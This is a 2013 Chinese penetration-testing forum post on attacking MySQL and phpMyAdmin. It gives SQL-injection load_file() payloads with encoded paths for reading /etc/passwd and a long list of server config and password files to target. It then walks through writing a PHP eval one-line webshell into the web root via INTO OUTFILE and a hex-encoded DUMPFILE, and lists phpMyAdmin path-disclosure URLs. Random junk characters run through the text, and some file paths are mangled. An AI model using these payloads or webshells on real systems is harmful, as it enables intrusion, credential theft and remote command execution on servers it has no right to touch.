中国网络渗透测试联盟

标题: 利用load_file()获取敏感文件与phpmyadmin拿webshell [打印本页]

作者: admin    时间: 2013-7-13 19:27
标题: 利用load_file()获取敏感文件与phpmyadmin拿webshell
利用load_file()获取敏感文件与phpmyadmin拿webshell" c) x# e! i2 U2 W4 i
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)) 上面两个是查看一个PHP文件里- ^' m0 F/ F7 o! T6 Z* |
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径:
4 D8 b' B, x9 V% t
0 c) L) }8 X2 Y3 d- n% _% c6 E1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
6 ^! ~3 `- c' u  g2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))  R3 l# `7 R0 e& X
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 < 替换成空格 返回的是网页.而无法查看到代码.# k3 W4 ?  C& ?0 \
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
4 M: X, N+ g5 ]& m1 q4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件, }; ?, d' e( `3 M& v
5、crogram FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf 查看WINDOWS系统apache文件5 i- z) j; a5 y" m5 h8 T( c. Z8 J
6、c:/Resin-3.0.14/conf/resin.conf   查看jsp开发的网站 resin文件配置信息.
1 {8 S6 M) B3 [& @" j7、c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机& E! m  D) n. k
8、d:APACHEApache2confhttpd.conf
7 f+ w4 S- j/ h9、Crogram Filesmysqlmy.ini
9 J$ @" a5 D5 k& @4 M  E10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
# d  Y9 F* h6 l7 A5 ^- t$ Y/ W11、 c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置文件
( z" J- w7 }# P' n( B" ?12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
' v5 _3 T; p) e13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上" ?. q2 |+ _: p
14 、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
& @+ B6 B3 A, U7 X# c) M15、 /etc/sysconfig/iptables 本看防火墙策略
) c# l' ]) H0 q" N1 G; `16 、 usr/local/app/php5/lib/php.ini PHP 的相当设置
/ @  C1 s: B. L+ J: K17 、/etc/my.cnf MYSQL的配置文件2 ?/ D& h  ^' W# a5 }
18、 /etc/redhat-release   红帽子的系统版本7 f5 U" ^: M- o, C3 l( J2 H0 T
19 、C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码
4 D1 @5 M# m, i20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.) B6 s5 Q5 j$ n3 [: S
21、/usr/local/app/php5/lib/php.ini //PHP相关设置, Z$ P" k$ {  O* m' X/ W3 D
22、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置9 R' K6 \9 E' K. T3 W' ^
23、crogram FilesRhinoSoft.comServ-UServUDaemon.ini: n# O5 I* m! X. z/ h9 }
24、c:windowsmy.ini3 T5 |4 g/ [0 B1 q
---------------------------------------------------------------------------------------------------------------------------------
! H6 c# m- b& L, @4 J+ g( b1.如何拿到登陆密码. 自己想办法 + {1 D8 c0 T5 b1 D1 z- k7 n
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
) {, B% `4 f0 H9 E5 G3.选择一个Database.运行以下语句.- u7 r5 ~7 x5 M+ f" r7 Z$ c9 b
----start code---
% m/ D' c: l9 i+ ]/ m) @8 NCreate TABLE a (cmd text NOT NULL);- c5 h- S1 `  c  }3 l) u3 R+ P& z
Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');8 O' t  Z- \. B4 Q; {8 k
select cmd from a into outfile 'x:/phpMyAdmin/libraries/d.php';+ s+ R: c. \$ R; g* s
Drop TABLE IF EXISTS a;
: f% p$ g  [& [. v- g  l----end code---2 U. L1 n) H3 o) q+ a
4.如果没什么意外.对应网站得到webshell
& h0 j! x5 j4 o# p! B7 c7 I$ u思路与mssql一样,都是建个表,然后在表中插一句话木马,在导出到web目录!
* J$ s- {: W; I! c! I4 b补充:还可以直接用dumpfile来得到shell* X+ I2 w7 S8 H7 L
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
5 g( c# z) r1 F' P% Z  U* ^5 t$ E加密部分为 lanker 一句话 密码为 cmd2 h+ p8 A! g9 Q8 Q
--------------------------------------------------------------------------------------------------------
$ N$ C+ B6 |7 T- N- w9 \phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -                                       
* m  ~# ^  `8 Q) U. m   
: _- b- |  Q  w- e- C5 {# t9 S        http://target/phpmyadmin/libraries/string.lib.php
$ t. I5 ~' ^- a% x& q        http://target/phpmyadmin/libraries/string.lib.php" g: i) r2 a8 v; B6 S. Y3 x& d
        http://target/phpmyadmin/libraries/database_interface.lib.php
2 `1 T- p5 w& Z* L/ Z! f        http://target/phpmyadmin/libraries/db_table_exists.lib.php( R- b3 J1 o1 X$ D
        http://target/phpmyadmin/libraries/display_export.lib.php/ w5 n6 K, [" F. M4 l: J; I+ w$ Z
        http://target/phpmyadmin/libraries/header_meta_style.inc.php
( M8 Q) y5 G. k6 m5 ?        http://target/phpmyadmin/libraries/mcrypt.lib.php




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2